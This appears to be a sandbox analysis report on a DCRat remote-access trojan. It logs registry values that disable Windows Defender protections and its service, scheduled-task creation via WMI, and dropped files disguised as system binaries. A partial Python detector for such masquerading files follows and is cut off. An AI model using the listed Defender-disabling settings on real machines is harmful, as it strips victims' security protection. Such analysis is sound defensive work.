Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Windows\ja-JP\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\ModifiableWindowsApps\sihost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Java\jre-1.8\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\MSBuild\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File opened for modification C:\Program Files (x86)\MSBuild\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\MSBuild\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Java\jre-1.8\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\24dbde2999530e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ja-JP\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\it-IT\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\it-IT\61a52ddc9dd915 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\InputMethod\SHARED\conhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\InputMethod\SHARED\088424020bedd6 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\ja-JP\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\ja-JP\61a52ddc9dd915 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\diagnostics\system\IESecurity\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Performance\WinSAT\DataStore\38384e6a620884 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
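The two "Drops file" tables above, together with the "Executes dropped EXE" table, show comcommon.exe writing copies of itself under the names of Windows system binaries (winlogon.exe, sihost.exe, conhost.exe, WmiPrvSE.exe, msedge.exe, SearchApp.exe, SppExtComObj.exe) into directories where those names never legitimately occur, and writing a 14-character hex-named file (cc11b995f2a76d, 088424020bedd6, 61a52ddc9dd915, ...) beside each copy. The check below is an added example for this report, not the sandbox's signature logic and not code from the sample: it takes the dropped paths from the tables and flags any file whose name belongs to a known system binary but whose directory is not that binary's canonical location, then lists the directories that also hold a hex-named companion. The CANONICAL map is an assumption about a default Windows 10 install; WinSxS and servicing copies are deliberately ignored.

```python
"""Flag dropped files that borrow a Windows system binary's name but sit outside
its canonical directory, plus the hex-named companion files dropped beside them.

Added example for this report; not the sandbox's signature logic and not code
from the sample. DROPPED reproduces paths from the report's tables. CANONICAL
is an assumption about where a genuine copy of each name lives on a default
Windows 10 install (WinSxS and servicing stores are ignored on purpose).
"""
import re
from pathlib import PureWindowsPath

# Assumed legitimate parent directories per file name (lower-case, drive stripped).
CANONICAL = {
    "winlogon.exe": {r"windows\system32"},
    "sihost.exe": {r"windows\system32"},
    "conhost.exe": {r"windows\system32"},
    "sppextcomobj.exe": {r"windows\system32"},
    "wmiprvse.exe": {r"windows\system32\wbem", r"windows\syswow64\wbem"},
    "searchapp.exe": {r"windows\systemapps\microsoft.windows.search_cw5n1h2txyewy"},
    "msedge.exe": {
        r"program files (x86)\microsoft\edge\application",
        r"program files\microsoft\edge\application",
    },
}

# The report shows a 14-character hex-looking file written next to each
# masqueraded binary (e.g. cc11b995f2a76d); this pattern matches such names.
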